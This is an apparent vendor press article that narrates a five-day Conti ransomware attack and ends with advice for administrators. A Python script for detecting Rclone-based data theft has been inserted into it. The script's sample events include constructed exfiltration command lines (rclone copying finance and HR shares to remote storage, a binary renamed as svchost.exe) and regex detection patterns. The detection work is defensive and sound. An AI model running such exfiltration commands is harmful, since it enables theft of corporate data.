Conti ransomware attack in the live report

Five days in close contact with Conti ransomware: Sophos describes in three reports in detail the procedure of a real Conti ransomware attack and how it was stopped. Also included: attack behavior, technical background and practical tips for IT administrators.

Conti ransomware attacks, which have been increasingly active since the middle of last year, are an impressive example of how cybercriminals use modern and sophisticated technology to plan their attack in a targeted manner and thus greatly improve their chances of successfully penetrating corporate networks. In three detailed reports, the Sophos Rapid Response team describes a real attack and how it unfolded over five days. "This was a very rapid and potentially devastating attack," says Peter Mackenzie, manager of Sophos Rapid Response. "During our forensic investigation, we saw that the attackers exploited vulnerabilities in the firewall to compromise the network and gain access to domain administration data in just 16 minutes. After that, the attackers deployed Cobalt Strike agents on the servers that would form the backbone of the ransomware attack."

Cyber attackers live on the keyboard

The special thing about this attack was that the cybercriminals controlled it themselves and did not leave everything to an automated routine. In such human-operated attacks, the attackers can adapt and react to changing situations in real time. This flexibility gives the attacks a higher chance of success, and victims cannot feel safe just because an initial attack attempt has been discovered and thwarted. Otherwise, what happens in the following diary of a real Conti ransomware attack can happen to them, fortunately in this case with a happy ending.

Attack day 1

The attackers penetrate the firewall and need only 16 minutes to hijack the admin account on two of the victim's servers. They then deploy a Cobalt Strike agent on the first server, until this attack is discovered and stopped by the victim. Just 15 minutes later, the attackers repeat the action on the second server, and this time the attack goes unnoticed. With a foot in the door, the attackers set off on a "crawl" through the victim's company network and infect a third server.

Attack day 2

No attack activity is noticed by the victim.

Attack day 3

The attackers spend around ten hours looking for file folders with potentially interesting information and exfiltrate them with the help of the legitimate open source file management tool Rclone, which was installed unnoticed on the third hijacked server. Among other things, data from the finance, HR and IT departments is affected.
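An administrator hunting for the kind of Rclone-based staging described above could run logic like the following over process-creation telemetry. This is an added example, not code from the Sophos reports; the event fields, host names, user names, paths and regular expressions are constructed and would need tuning against real logs.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events for illustration only; not taken from the Sophos reports.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "SRV03", "user": r"CORP\svc_backup",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "SRV03", "user": r"CORP\admin1",
     "image": r"C:\Users\admin1\AppData\Local\Temp\rclone.exe",
     "cmdline": r'rclone.exe copy "D:\Shares\Finance" remote:finance --transfers 16 --config C:\Users\admin1\rclone.conf'},
    {"host": "WS114", "user": r"CORP\jdoe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "cmdline": "EXCEL.EXE /dde"},
    {"host": "SRV03", "user": r"CORP\admin1",
     "image": r"C:\ProgramData\svchost.exe",  # rclone dropped under a system-looking name
     "cmdline": r"svchost.exe sync \\FS01\HR mega:hr-export --no-check-certificate -P"},
]

# Heuristics: rclone subcommands that transfer data, a remote:path target, and flags typical of rclone.
# They still fire when the binary has been renamed, at the cost of some false positives to tune out.
RCLONE_VERBS = re.compile(r"(?:^|\s)(?:copy|sync|move|copyto|moveto)(?=\s)", re.IGNORECASE)
RCLONE_REMOTE = re.compile(r"(?:^|\s)[\w-]+:[\w/.-]*(?=\s|$)")  # e.g. remote:finance, mega:hr-export
RCLONE_FLAGS = re.compile(r"--(?:transfers|config|no-check-certificate|bwlimit|progress)\b|(?:^|\s)-P(?=\s|$)")


def rclone_indicators(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like an rclone transfer; an empty list means nothing matched."""
    reasons: List[str] = []
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    if image_name == "rclone.exe":
        reasons.append("image name is rclone.exe")
    if RCLONE_VERBS.search(cmd) and RCLONE_REMOTE.search(cmd):
        reasons.append("transfer verb with remote:path target")
    if RCLONE_FLAGS.search(cmd):
        reasons.append("rclone-specific flags")
    if reasons and image_name != "rclone.exe":
        reasons.append(f"binary renamed to {image_name}")  # the renamed-binary case
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Filter events down to those with rclone indicators, keeping host and user for triage."""
    return [{"host": ev["host"], "user": ev["user"], "reasons": r}
            for ev in events if (r := rclone_indicators(ev))]
```

On the constructed sample, the benign svchost.exe and Excel events produce no indicators, while both the plainly named rclone.exe and the renamed copy on SRV03 are flagged with their reasons.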

Attack day 4

The attackers use the knowledge about the endpoint and server structure gathered since day 1 and first install a Cobalt Strike agent on a fourth server to test the ransomware. After the success message, they install Cobalt Strike on almost 300 devices and start the Conti ransomware after another 40 minutes. The compromised endpoints load the code from various command-and-control (C2) addresses and execute it. The insidious part: no data is written to the hard drives; instead, the ransomware is executed directly in main memory to avoid detection. The ransomware then tries to encrypt data for three hours, but is blocked on the computers protected with Sophos Intercept X despite this evasion tactic. The attacked company now cuts the Internet connection, with the exception of the Sophos application, shuts down the critical infrastructure and halts work processes. The Sophos Rapid Response team is called in, identifies the infected endpoints and servers, stops the various attack processes and begins to restore the compromised areas.

Attack day 5

During their final investigation, the Rapid Response team identifies a second potential data exfiltration, a second compromised account and suspicious RDP (Remote Desktop Protocol) traffic through the vulnerable firewall. At the same time, the victim restores the unsecured endpoints and powers the critical infrastructure back up.

The moral of the story

It is often the IT administrators who are in the direct line of fire in the event of a ransomware attack. They are the ones who come to work in the morning and find everything encrypted, including a ransom note. Based on the experience of its Rapid Response team, Sophos has developed an action list to help administrators cope with the challenging first few hours and the following days of a ransomware attack.

  • Turn off Remote Desktop Protocol (RDP) exposure to the Internet to prevent cybercriminals from accessing networks.
  • If RDP access is absolutely necessary, secure it via a VPN connection.
  • Multi-layered security measures, including EDR (Endpoint Detection and Response) functions and managed response teams for 24/7 monitoring of the networks, prevent attacks and make a significant contribution to the protection against and detection of cyber attacks.
  • Constantly monitor known leading indicators that often precede ransomware attacks.
  • Create an incident response plan and keep it continuously updated as the IT infrastructure and the company change.
  • External experts with extensive experience can offer excellent assistance here.

Three Conti ransomware reports from Sophos

In the three reports from Sophos, the Conti ransomware attack is described from different perspectives and specific instructions are given in the event of an attack. The English-language reports can be downloaded from the following links:

Timing of a Conti ransomware attack:

A Conti Ransomware Attack Day-by-Day

Technical description of the SophosLabs on the evasive nature of Conti ransomware:

Conti Ransomware: Evasive by Nature

Instructions including a 12-point checklist for IT administrators to cope with an attack:

What to Expect When You've Been Hit with Conti Ransomware

More on this at Sophos.com

About Sophos

More than 100 million users in 150 countries trust Sophos. We offer the best protection against complex IT threats and data loss. Our comprehensive security solutions are easy to deploy, use and manage, and they offer the lowest total cost of ownership in the industry. Sophos offers award-winning encryption solutions as well as security solutions for endpoints, networks, mobile devices, email and the web. In addition, there is support from SophosLabs, our worldwide network of analysis centers. The Sophos headquarters are in Boston, USA and Oxford, UK.
